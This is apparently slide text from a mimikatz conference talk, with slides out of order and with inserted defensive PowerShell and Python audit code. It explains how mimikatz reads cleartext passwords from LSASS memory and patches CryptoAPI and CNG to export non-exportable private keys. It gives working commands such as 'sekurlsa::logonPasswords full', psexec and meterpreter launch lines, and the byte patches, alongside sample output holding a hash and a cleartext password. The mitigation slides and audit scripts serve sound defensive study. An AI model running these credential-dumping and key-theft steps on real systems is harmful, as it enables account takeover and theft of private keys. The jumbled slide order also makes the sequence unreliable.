  psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::exportKeys computer exit

  mimikatz # crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop"

  mimikatz # privilege::debug
  mimikatz # crypto::patchcng
  mimikatz # crypto::patchcapi
  mimikatz # crypto::exportCertificates
  mimikatz # crypto::exportKeys
  mimikatz # exit

Password
– PFX files are protected by this password: mimikatz
Keys
– When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key… funny, isn't it?
  • So yes, mimikatz can export it
mimikatz :: crypto :: what we can do

Exactly the same as for sekurlsa: it will prevent access to the accounts/computer
– no admin, no admin, no admin…
Basics
– Use smartcards/tokens for user certificates
– Use Hardware Security Modules (HSM), even SoftHSM
More in depth
– See what Microsoft can do with the TPM from Windows 8
  • Virtual SmartCard seems promising
– Verify vendors' implementations (Lenovo, Dell, …) of TPM CSP/KSP
  • Their biometrics stuff was a little buggy ;)
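A practical first step behind these recommendations, and behind the memo's remark that deleting a certificate leaves its private key on disk, is to know which keys on a machine are software-only and which key files nobody references any more. The following PowerShell is an added example, not code from the talk or from mimikatz: it classifies each certificate's private key as CryptoAPI (CSP) or CNG (KSP), reports the export flag, flags the rsaenh-based CSPs and the Microsoft Software KSP named in the talk as software-only, and lists orphaned user key files. It assumes Windows PowerShell 5.1 with .NET Framework 4.6+ (for RSACertificateExtensions), RSA keys, and that it runs in the session of the user whose store is audited; the function names are mine.

```powershell
# Added example, not mimikatz code: private key inventory and orphan key file check.
# Assumes Windows PowerShell 5.1 / .NET Framework 4.6+; RSA keys only.

# Providers the talk lists as software-only: the rsaenh.dll based CSPs (targets of
# crypto::patchcapi) and the Microsoft Software KSP (target of crypto::patchcng).
# Their keys are DPAPI-protected files, not hardware-held secrets.
$SoftwareProviders = @(
    'Microsoft Base Cryptographic Provider v1.0',
    'Microsoft Enhanced Cryptographic Provider v1.0',
    'Microsoft Enhanced RSA and AES Cryptographic Provider',
    'Microsoft RSA SChannel Cryptographic Provider',
    'Microsoft Strong Cryptographic Provider',
    'Microsoft Software Key Storage Provider'
)

function Get-PrivateKeyInventory {
    param([string]$StorePath = 'Cert:\CurrentUser')
    # -Recurse walks every store below the path; keep certificate objects with a key.
    $certs = Get-ChildItem $StorePath -Recurse |
        Where-Object { $_ -is [System.Security.Cryptography.X509Certificates.X509Certificate2] -and $_.HasPrivateKey }
    foreach ($cert in $certs) {
        $row = [ordered]@{
            Store = $cert.PSParentPath -replace '^.*::', ''
            Subject = $cert.Subject; Thumbprint = $cert.Thumbprint
            Api = 'unknown'; Provider = $null; Exportable = $null; UniqueName = $null; SoftwareOnly = $null
        }
        try {
            # Opens the key through the API that owns it; a popup-protected key may prompt here.
            $rsa = [System.Security.Cryptography.X509Certificates.RSACertificateExtensions]::GetRSAPrivateKey($cert)
        } catch { $rsa = $null }   # key container not readable in this session

        if ($rsa -is [System.Security.Cryptography.RSACng]) {
            # CNG: the KSP performs the operations in the Key Isolation service (lsass).
            $key = $rsa.Key
            $row.Api        = 'CNG'
            $row.Provider   = $key.Provider.Provider
            $row.Exportable = ([int]($key.ExportPolicy -band [System.Security.Cryptography.CngExportPolicies]::AllowExport)) -ne 0
            $row.UniqueName = $key.UniqueName            # file name under %APPDATA%\Microsoft\Crypto\Keys
        } elseif ($rsa -is [System.Security.Cryptography.RSACryptoServiceProvider]) {
            # CryptoAPI: the CSP DLL (rsaenh.dll for the providers above) runs in this process.
            $csp = $rsa.CspKeyContainerInfo
            $row.Api        = 'CAPI'
            $row.Provider   = $csp.ProviderName
            $row.Exportable = $csp.Exportable
            $row.UniqueName = $csp.UniqueKeyContainerName # file name under %APPDATA%\Microsoft\Crypto\RSA\<SID>
        }
        $row.SoftwareOnly = $SoftwareProviders -contains $row.Provider
        [pscustomobject]$row
    }
}

function Get-OrphanKeyFile {
    # Key files of the current user that no certificate in the CurrentUser stores
    # references: what a deleted or repeatedly re-imported certificate leaves behind.
    $referenced = Get-PrivateKeyInventory -StorePath 'Cert:\CurrentUser' | ForEach-Object { $_.UniqueName }
    $keyDirs = @("$env:APPDATA\Microsoft\Crypto\RSA",    # CryptoAPI user keys, one subfolder per SID
                 "$env:APPDATA\Microsoft\Crypto\Keys")   # CNG software KSP user keys
    Get-ChildItem -Path $keyDirs -File -Recurse -ErrorAction SilentlyContinue |
        Where-Object { $referenced -notcontains $_.Name } |
        Select-Object FullName, Length, LastWriteTime
}

Get-PrivateKeyInventory | Format-Table Store, Subject, Api, Provider, Exportable, SoftwareOnly -AutoSize
Get-OrphanKeyFile | Format-Table -AutoSize
```

Rows with SoftwareOnly = True are the keys a smartcard, HSM or TPM-backed KSP would take out of reach of the patches described in the previous slides; orphan files can be compared against certificates in other stores before being removed.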
mimikatz :: what else can it do?

– Play with minesweeper
– Manipulate some handles
– Pass the hash
– Dump SAM / AD
– Stop event monitoring
– Patch Terminal Server
– Basic GPO bypass
– Applocker / SRP bypass
– Driver
  • Play with tokens & privileges
  • Display SSDT x86 & x64
  • List minifilters actions
  • List Notifications (process, thread, image, registry)
  • List Objects hooks and procedures
  • …
– …
mimikatz :: that's all folks!

Thanks to
– my girlfriend, for her support (her LSASS crashed a few times)
– Application Security Forum, for offering me this great opportunity
  • Partners and Sponsors, for sure
– Microsoft, for always considering it as normal/acceptable
– Security friends/community, for their ideas & challenges
  • nagual, newsoft, mubix, …
– You, for your attention

Questions?
Don't be shy ;)
especially if you have written down the corresponding slide number
Blog, Source Code & Contact

blog     : http://blog.gentilkiwi.com
mimikatz : http://blog.gentilkiwi.com/mimikatz
source   : https://code.google.com/p/mimikatz
email    : benjamin@gentilkiwi.com
mimikatz :: sekurlsa

Even if we already have tools for normal accounts, are you not curious to test one with this trap?
Me, yes!
mimikatz :: sekurlsa :: kerberos

Let's log in with a normal account
After credentials protection, KerbCreateLogonSession calls
– NT6: KerbInsertOrLocateLogonSession, to insert data in KerbGlobalLogonSessionTable
– NT5: KerbInsertLogonSession, to insert data in KerbLogonSessionList

[Call-stack diagram, frames as listed on the slide:
  lsasrv!LsaProtectMemory ← kerberos!KerbHideKey ← kerberos!KerbCreatePrimaryCredentials ← kerberos!KerbCreateLogonSession ← kerberos!SpAcceptCredentials
  lsasrv!LsaProtectMemory ← kerberos!KerbHidePassword ← kerberos!KerbCreateLogonSession ← kerberos!SpAcceptCredentials
  lsasrv!LsaProtectMemory ← msv1_0!NlpAddPrimaryCredential ← msv1_0!SspAcceptCredentials ← msv1_0!SpAcceptCredentials
  lsasrv!LsaProtectMemory ← wdigest!SpAcceptCredentials
  lsasrv!LsaProtectMemory ← tspkg!TSHidePassword ← tspkg!SpAcceptCredentials
 Labels: "Kerberos part for password", "Kerberos ticket part? Maybe ;)"]
mimikatz :: sekurlsa :: kerberos (nt6) workflow

[Workflow: LsaEnumerateLogonSessions → for each LUID: RtlLookupElementGenericTableAvl in kerberos!KerbGlobalLogonSessionTable → KIWI_KERBEROS_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear]

typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
    DWORD unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
#ifdef _M_X64
    BYTE unk4[32];
#elif defined _M_IX86
    BYTE unk4[20];
#endif
    LUID LocallyUniqueIdentifier;
#ifdef _M_X64
    BYTE unk5[44];
#elif defined _M_IX86
    BYTE unk5[36];
#endif
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
mimikatz :: sekurlsa :: kerberos (nt5) workflow

[Workflow: LsaEnumerateLogonSessions → for each LUID: search the kerberos!KerbLogonSessionList linked list for the LUID → KIWI_KERBEROS_LOGON_SESSION → LsaUnprotectMemory → password in clear]

typedef struct _KIWI_KERBEROS_LOGON_SESSION {
    struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
    struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
    DWORD UsageCount;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    DWORD unk3;
    DWORD unk4;
    PVOID unk5;
    PVOID unk6;
    PVOID unk7;
    LUID LocallyUniqueIdentifier;
#ifdef _M_IX86
    DWORD unk8;
#endif
    DWORD unk9;
    DWORD unk10;
    PVOID unk11;
    DWORD unk12;
    DWORD unk13;
    PVOID unk14;
    PVOID unk15;
    PVOID unk16;
    […]
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
mimikatz :: sekurlsa :: demo time

Final sekurlsa demo: sekurlsa::logonPasswords full
mimikatz :: sekurlsa :: kerberos :: "hu?"

Ok. It works…
But why?
Not at all logons on NT5 (an unlock can be needed)
From my understanding of Microsoft's explanations
– no need of passwords for the Kerberos protocol…
– all is based on the hash (not very sexy either)
Microsoft's implementation of Kerberos is full of logic…
– For password auth
  • password hash for the shared secret, but keeping the password in memory
– For full smartcard auth
  • No password on the client
  • No hash on the client
    – NTLM hash on the client…
    – the KDC sent it back as a gift
mimikatz :: sekurlsa

All passwords in memory are encrypted, but in a reversible way, to be usable.
We used LsaUnprotectMemory in the LSASS context to decrypt them
– This function relies on LsaEncryptMemory from lsasrv.dll
For that, we previously injected a DLL (sekurlsa.dll) into the LSASS process to take advantage of its keys when we called it.
Can it be fun to decrypt outside the process?
– Yes it is… no more injection, just reading the memory of the LSASS process…
mimikatz can use lsasrv.dll too and "imports" the keys initialized by LSASS
– When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS, we get the same behaviour as when we are in LSASS
mimikatz :: sekurlsa :: LsaEncryptMemory NT5

Depending on the size of the secret, LsaEncryptMemory uses
– RC4
– DESx

[Diagram: lsasrv globals inside the lsass process: g_cbRandomKey (DWORD, 256), g_pRandomKey (BYTE[g_cbRandomKey]), g_pDESXKey (BYTE[144]), g_Feedback (BYTE[8]); mimikatz loads its own lsasrv, copies these from lsass ("copy…") and then calls LsaUnprotectMemory]
mimikatz :: sekurlsa :: LsaEncryptMemory NT6

Depending on the size of the secret, LsaEncryptMemory uses
– 3DES
– AES

[Diagram: lsasrv globals inside the lsass process: InitializationVector (BYTE[16]), h3DesKey and hAesKey (PKIWI_BCRYPT_KEY, each pointing to a KIWI_BCRYPT_KEY_DATA); mimikatz loads its own lsasrv and copies them from lsass ("copy…")]

typedef struct _KIWI_BCRYPT_KEY_DATA {
    DWORD size;
    DWORD tag;
    DWORD type;
    DWORD unk0;
    DWORD unk1;
    DWORD unk2;
    DWORD unk3;
    PVOID unk4;
    BYTE data; /* etc. */
} KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

typedef struct _KIWI_BCRYPT_KEY {
    DWORD size;
    DWORD type;
    PVOID unk0;
    PKIWI_BCRYPT_KEY_DATA cle;
    PVOID unk1;
} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
mimikatz :: sekurlsa :: memo

Security Packages

  Package          Symbols                                                 Type
  tspkg            tspkg!TSGlobalCredTable                                 RTL_AVL_TABLE
  wdigest          wdigest!l_LogSessList                                   LIST_ENTRY
  livessp          livessp!LiveGlobalLogonSessionList                      LIST_ENTRY
  kerberos (nt5)   kerberos!KerbLogonSessionList                           LIST_ENTRY
  kerberos (nt6)   kerberos!KerbGlobalLogonSessionTable                    RTL_AVL_TABLE
  msv1_0           lsasrv!LogonSessionList, lsasrv!LogonSessionListCount   LIST_ENTRY, ULONG

Protection Keys

  Key    NT 5 Symbols
  RC4    lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey
  DESx   lsasrv!g_pDESXKey, lsasrv!g_Feedback

  Key    NT 6 Symbols
         lsasrv!InitializationVector
  3DES   lsasrv!h3DesKey
  AES    lsasrv!hAesKey
mimikatz :: sekurlsa :: memo

Some commands
  mimikatz # privilege::debug
  mimikatz # sekurlsa::logonPasswords full
  mimikatz # exit

  psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe sekurlsa::logonPasswords full exit

  meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe

mimikatz 1.0 x64 (RC)   /* Traitement du Kiwi (Aug  2 2012 01:32:28) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # sekurlsa::logonPasswords full

Authentification Id        : 0;234870
Package d'authentification : NTLM
Utilisateur principal      : Gentil Kiwi
Domaine d'authentification : vm-w8-rp-x
        msv1_0 :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Hash LM      : d0e9aee149655a6075e4540af1f22d3b
         * Hash NTLM    : cc36cf7a8514893efccd332446158b1a
        kerberos :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Mot de passe : waza1234
        wdigest :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Mot de passe : waza1234
        tspkg :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Mot de passe : waza1234
        livessp :
         * n.t. (LUID KO)
mimikatz :: sekurlsa :: what we can do

Basics
– No physical access to the computer (first step to pass the hash, then pass the pass)
– No admin rights / system rights / debug privileges (…)
– Disable local admin accounts
– Strong passwords (haha, it was a joke, so useless!)
– For privileged accounts, network logon instead of interactive (when possible)
– Audit: pass the hash leaves traces and can lock accounts
– No admin rights / system rights / debug privileges, even for VIPs
– Use a separate network (or forest) for privileged tasks
More in depth
– Force strong authentication (SmartCard & Token) $ €
– Short validity for Kerberos tickets
– No delegation
– Disable NTLM (available with NT6)
– No exotic
  • biometrics (it keeps the password somewhere and pushes it to Windows)
  • single sign-on
– Stop shared secrets for authentication, push Public/Private stuff (like keys ;))
– Take opportunities to stop retro-compatibility
– Disable faulty providers
  • Is it supported by Microsoft?
  • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
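Several of the items above map to settings you can read off a machine: the NTLM restriction and compatibility level, the security packages loaded into LSASS (the slide's "faulty providers"), and who holds the debug privilege that the patches and the memory reads require. The following PowerShell is an added example, not code from the talk or from mimikatz; it assumes an elevated Windows PowerShell session (secedit export), uses the documented Lsa and MSV1_0 registry value names, and the interpretation comments and function name are mine.

```powershell
# Added example, not mimikatz code: read the local settings behind the slide's
# mitigations and return them as one object. Run elevated (secedit export).
function Get-LsaHardeningReport {
    $lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $p   = Get-ItemProperty $lsa
    $m   = Get-ItemProperty (Join-Path $lsa 'MSV1_0')
    $report = [ordered]@{}

    # Security Packages: the SSPs LSASS loads. The talk names wdigest, tspkg and
    # livessp as packages that keep a reversible password in memory.
    $packages = @($p.'Security Packages' | Where-Object { $_ })
    $report.SecurityPackages = $packages -join ' '
    $report.ReversiblePasswordPackagesLoaded = ($packages | Where-Object { $_ -in 'wdigest','tspkg','livessp' }) -join ' '

    # LmCompatibilityLevel: 5 = send NTLMv2 only and refuse LM/NTLM; absent = OS default.
    $report.LmCompatibilityLevel = $(if ($null -ne $p.LmCompatibilityLevel) { $p.LmCompatibilityLevel } else { 'not set (OS default)' })
    # "Disable NTLM (available with NT6)": Restrict NTLM policies; 2 = deny all for outgoing.
    $report.RestrictSendingNTLMTraffic   = $m.RestrictSendingNTLMTraffic
    $report.RestrictReceivingNTLMTraffic = $m.RestrictReceivingNTLMTraffic

    # SeDebugPrivilege holders from the effective local policy ("no debug privileges").
    $inf = Join-Path $env:TEMP 'secpol-export.inf'
    & secedit.exe /export /cfg $inf /quiet | Out-Null
    $line = Get-Content $inf | Select-String -Pattern '^SeDebugPrivilege\s*=\s*(.*)$' | Select-Object -First 1
    $holders = @()
    if ($line) {
        $holders = $line.Matches[0].Groups[1].Value -split ',' | ForEach-Object {
            $id = $_.Trim().TrimStart('*')   # entries are usually *SID, sometimes account names
            try { (New-Object System.Security.Principal.SecurityIdentifier($id)).Translate([System.Security.Principal.NTAccount]).Value }
            catch { $id }
        }
    }
    $report.SeDebugPrivilegeHolders = $holders -join '; '
    Remove-Item $inf -ErrorAction SilentlyContinue

    [pscustomobject]$report
}

Get-LsaHardeningReport | Format-List
```

Kerberos ticket lifetime and delegation settings are domain policy rather than local settings, so they are not read here.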
mimikatz :: crypto :: what is it?

A little module that I wrote to
– play with Windows Cryptographic API, CNG and RSA keys
– automate export of certificates/keys
  • Even those which are "not" exportable
What the crypto module can do
– List
  • Providers
  • Stores
  • Certificates
  • Keys
– Export
  • Certificates
    – public, in DER format
    – with private keys, in PFX format
  • Private keys in PVK format
    – it's cool, OpenSSL can deal with it too
– Patch
  • CryptoAPI in mimikatz context
  • CNG in LSASS context (again :))
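The PVK format mentioned above is a thin Microsoft wrapper around a CryptoAPI PRIVATEKEYBLOB, and whether the blob inside is password-protected is visible from the header alone. The following is an added example, not code from the slides or from mimikatz: it parses the fixed PVK header and, when the file is not password-protected, decodes the RSA blob far enough to report the algorithm, key size and public exponent, which is what a responder wants to know when an exported .pvk turns up on a host. Both sample files are constructed in memory; the RSA numbers inside have the right layout but are placeholders, not a real key.

```python
"""Triage a Microsoft PVK private-key file before anyone loads it.

Added example (not code from the slides or from mimikatz): the fixed PVK
header is parsed and, when the file is not password-protected, the RSA
PRIVATEKEYBLOB that follows is decoded far enough to report the algorithm,
key size and exponent. An unprotected .pvk is a plaintext private key.
Both sample files are constructed in memory; the RSA numbers inside are
placeholders with the right layout only.
"""
import struct

PVK_MAGIC = 0xB0B5F11E                # first DWORD of every PVK file
PVK_NO_ENCRYPT = 0
PVK_RC4_PASSWORD_ENCRYPT = 1          # blob RC4-encrypted under a password-derived key
PRIVATEKEYBLOB = 0x07                 # BLOBHEADER.bType for a private key
CUR_BLOB_VERSION = 0x02
RSA2_MAGIC = 0x32415352               # b"RSA2": RSAPUBKEY.magic of a private key blob
CALG_RSA_KEYX, CALG_RSA_SIGN = 0x0000A400, 0x00002400
CALG_NAMES = {CALG_RSA_KEYX: "CALG_RSA_KEYX", CALG_RSA_SIGN: "CALG_RSA_SIGN"}
KEYSPEC_NAMES = {1: "AT_KEYEXCHANGE", 2: "AT_SIGNATURE"}

PVK_HEADER = struct.Struct("<6I")     # magic, reserved, keyspec, encrypt_type, salt_len, key_len
BLOB_HEADER = struct.Struct("<BBHI")  # bType, bVersion, reserved, aiKeyAlg
RSAPUBKEY = struct.Struct("<III")     # magic, bitlen, pubexp


def parse_rsa_private_blob(blob: bytes) -> dict:
    """Decode BLOBHEADER + RSAPUBKEY and measure the modulus that follows."""
    btype, _bver, _res, alg = BLOB_HEADER.unpack_from(blob, 0)
    if btype != PRIVATEKEYBLOB:
        raise ValueError("not a PRIVATEKEYBLOB")
    magic, bitlen, pubexp = RSAPUBKEY.unpack_from(blob, BLOB_HEADER.size)
    if magic != RSA2_MAGIC:
        raise ValueError("not an RSA2 private key blob")
    off = BLOB_HEADER.size + RSAPUBKEY.size
    modulus = blob[off:off + bitlen // 8]             # little-endian, bitlen/8 bytes
    if len(modulus) != bitlen // 8:
        raise ValueError("truncated modulus")
    return {
        "algorithm": CALG_NAMES.get(alg, hex(alg)),
        "bits": bitlen,
        "public_exponent": pubexp,
        "modulus_bits": int.from_bytes(modulus, "little").bit_length(),
    }


def parse_pvk(data: bytes) -> dict:
    """Return what can be learned from a PVK file without knowing any password."""
    if len(data) < PVK_HEADER.size:
        raise ValueError("too short for a PVK header")
    magic, _reserved, keyspec, enc, salt_len, key_len = PVK_HEADER.unpack_from(data)
    if magic != PVK_MAGIC:
        raise ValueError("not a PVK file (bad magic)")
    start = PVK_HEADER.size + salt_len                # salt sits between header and blob
    blob = data[start:start + key_len]
    if len(blob) != key_len:
        raise ValueError("truncated PVK body")
    info = {
        "keyspec": KEYSPEC_NAMES.get(keyspec, hex(keyspec)),
        "password_protected": enc == PVK_RC4_PASSWORD_ENCRYPT,
        "salt_len": salt_len,
        "blob_len": key_len,
    }
    if not info["password_protected"]:                # plaintext blob: decode it
        info.update(parse_rsa_private_blob(blob))
    return info


def is_pvk(data: bytes) -> bool:
    """True when the bytes carry a well-formed PVK header and body."""
    try:
        parse_pvk(data)
        return True
    except ValueError:
        return False


def _constructed_rsa2_blob(bitlen: int) -> bytes:
    """Constructed PRIVATEKEYBLOB: correct layout, placeholder numbers (not a real key)."""
    n = bitlen // 8
    modulus = b"\x01" * (n - 1) + b"\xC3"             # top byte 0xC3 makes bit_length == bitlen
    half = b"\x02" * (n // 2)
    body = modulus + half * 5 + b"\x03" * n           # modulus, p, q, dp, dq, iqmp, d
    return (BLOB_HEADER.pack(PRIVATEKEYBLOB, CUR_BLOB_VERSION, 0, CALG_RSA_KEYX)
            + RSAPUBKEY.pack(RSA2_MAGIC, bitlen, 65537) + body)


_BLOB = _constructed_rsa2_blob(512)
# Constructed sample files: one exported without a password, one with.
SAMPLE_PLAIN_PVK = PVK_HEADER.pack(PVK_MAGIC, 0, 1, PVK_NO_ENCRYPT, 0, len(_BLOB)) + _BLOB
SAMPLE_ENCRYPTED_PVK = (PVK_HEADER.pack(PVK_MAGIC, 0, 1, PVK_RC4_PASSWORD_ENCRYPT, 16, len(_BLOB))
                        + b"\x55" * 16 + b"\xAA" * len(_BLOB))   # salt, then opaque ciphertext

if __name__ == "__main__":
    for name, sample in (("plain.pvk", SAMPLE_PLAIN_PVK), ("protected.pvk", SAMPLE_ENCRYPTED_PVK)):
        print(name, parse_pvk(sample))
```

For a full decode of a real file, OpenSSL's `rsa` command accepts `-inform PVK`, which is the interoperability the slide refers to; the parser above is for the quick "is this a plaintext key?" question that precedes it.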
mod_mimikatz_crypto
mimikatz :: crypto :: how it's protected

Private keys are DPAPI protected
– You cannot reuse private key files on another computer
  • At least not without the master keys and/or passwords of the users
Computer/User can load their own keys because they have enough secrets to do it (ex: session opened)
– Yes, a computer/server opens a "session"
Export/Usage can be limited by
– Password
– Popup
– Export/Archive flag not present
(Password and popup: a constraint for most users, unavailable for computer keys)
certutil -importpfx mycert.p12 NoExport
certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz :: crypto :: capi :: how it works

"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware."
– http://technet.microsoft.com/library/cc962093.aspx
Processes (mimikatz, IIS, Active Directory, Internet Explorer, your apps here…) load some DLLs to deal with different cryptographic stuff: CSP (keys), smartcard reader, …
– cryptdll.dll, rsaenh.dll, …
Processes deal with cryptographic keys through this API…
mimikatz :: crypto :: capi :: how it's exported (level)

[Diagram: the process loads the private key through CryptoAPI and the RSA CSP (DPAPI decode), then asks the CSP to export the key. If the key is flagged exportable, the CSP returns the exported key; if not, the call fails with NTE_BAD_KEY_STATE. The exportable check sits inside the CSP, in the process's own memory; the slide labels it "PLAYSKOOL".]
mimikatz :: crypto :: patchcapi :: because I own my process

When we want to export a certificate with its private key (or only the key), it goes in rsaenh!CPExportKey
This function does all the work to prepare the export and checks if the key is exportable
mimikatz # crypto::exportCertificates
Emplacement : CERT_SYSTEM_STORE_CURRENT_USER\My
 - Benjamin Delpy
	Container Clé : 470ADFBA-8718-4014-B05E-B30776B75A03
	Provider : Microsoft Enhanced Cryptographic Provider v1.0
	Type : AT_KEYEXCHANGE
	Exportabilité : NON
	Taille clé : 2048
	Export privé dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx : KO (0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié.
	Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der : OK

================ Certificat 0 ================
Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
Émetteur : CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Objet : CN=Benjamin Delpy, C=FR
Il ne s'agit pas d'un certificat racine
Hach. cert. (sha1) : ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
  Conteneur de clé = 470ADFBA-8718-4014-B05E-B30776B75A03
  Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
La clé privée NE PEUT PAS être exportée
Succès du test de cryptage
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.
(callout on the slide: Exportable)
mimikatz :: crypto :: patchcapi :: because I own my process

So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space, let's patch it!
I wrote "4" bytes in my memory space
.text:0AC0B7CB  0F 85 33 C7 FF FF    jnz     continue_key_export_or_archive
.text:0AC0B7CB  90                   nop
.text:0AC0B7CC  E9 33 C7 FF FF       jmp     continue_key_export_or_archive
.text:0AC1F749  0F 85 B6 3B FF FF    jnz     continue_key_export_or_archive_prepare
.text:0AC1F749  90                   nop
.text:0AC1F74A  E9 B6 3B FF FF       jmp     continue_key_export_or_archive_prepare
mimikatz :: crypto :: patchcapi :: demo time

Import, export, import as not exportable… export
mimikatz :: crypto :: patchcapi :: limitations

Because
– I'm lazy
– I've seen, in the majority of cases, RSA keys for real life use
  • Elliptic Curve, a little…
mimikatz crypto::patchcapi only deals with
– Microsoft Base Cryptographic Provider v1.0
– Microsoft Enhanced Cryptographic Provider v1.0
– Microsoft Enhanced RSA and AES Cryptographic Provider
– Microsoft RSA SChannel Cryptographic Provider
– Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll
mimikatz :: crypto :: cng :: how it works

"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior."
– http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."
This time, key operations are not made in the "user" process context
Processes use RPC to call "Key Isolation service" (keyiso) functions
It seems more secure than CryptoAPI…
– It is, but it's not perfect…
mimikatz :: crypto :: cng :: how it's exported (level)

[Diagram: the process calls CNG, which goes over RPC to the KeyIso service hosted in the LSASS process (on NT6 a System protected process: ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP, SYSTEM_MANDATORY_LABEL_NO_READ_UP). KeyIso loads the private key (DPAPI decode) and handles the export request: if the key is exportable, the exported key goes back to the process, otherwise the call fails with NTE_NOT_SUPPORTED. The exportable check, again labelled "PLAYSKOOL", now lives in LSASS rather than in the caller's memory.]
mimikatz :: crypto :: patchcng :: because sometimes I own LSASS

When we want to export a certificate with its private key (or only the key), RPC calls lead to lsass (keyiso): ncrypt!SPCryptExportKey
This function does all the work to prepare the export and checks if the key is exportable
mimikatz # crypto::exportKeys
[user]
Clés CNG :
 - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
	Exportabilité : NON
	Taille clé : 2048
	Export privé dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk : KO
	mod_cryptong::getPrivateKey / PrivateKeyBlobToPVK (0x80090029) L'opération demandée n'est pas prise en charge.
(callout on the slide: Exportable)
mimikatz :: crypto :: patchcng :: because sometimes I own LSASS

This time, checks and keys are in the LSASS process… And what?
I wrote "1" byte in LSASS memory space…
.text:6C815210  75 1C    jnz     short continue_key_export
.text:6C815210  EB 1C    jmp     short continue_key_export
mimikatz :: crypto :: patchcng :: demo time

Import, export, import as not exportable… export again
mimikatz :: crypto :: patchcng :: limitations

Patch operation needs some privileges
– Admin (debug privilege)
– SYSTEM
mimikatz crypto::patchcng only deals with
– Microsoft Software Key Storage Provider (maybe other algs than RSA)
Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates… even those that are exportable (huh?)
– certutil can…
mimikatz :: crypto :: patchcng :: bonus

After one admin has patched LSASS, all users of the current system benefit from the extra exports
– until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for the export can work too
– Yeah, like the good old certutil
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

(same command after crypto::patchcng)
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
Succès du test de chiffrement
CertUtil: -exportPFX La commande s'est terminée correctement.
mimikatz :: crypto :: memo

Some commands
mimikatz crypto::patchcapi crypto::exportCertificates exit
